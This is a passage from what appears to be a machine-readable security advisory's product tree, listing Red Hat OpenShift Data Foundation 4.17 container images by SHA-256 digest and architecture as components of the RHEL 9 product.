"odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", }, product_reference: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", }, product_reference: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", }, product_reference: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", }, product_reference: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", }, product_reference: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", }, product_reference: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", }, product_reference: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", }, product_reference: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", }, product_reference: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", }, product_reference: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", }, product_reference: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le as a component of RHODF 4.17 for 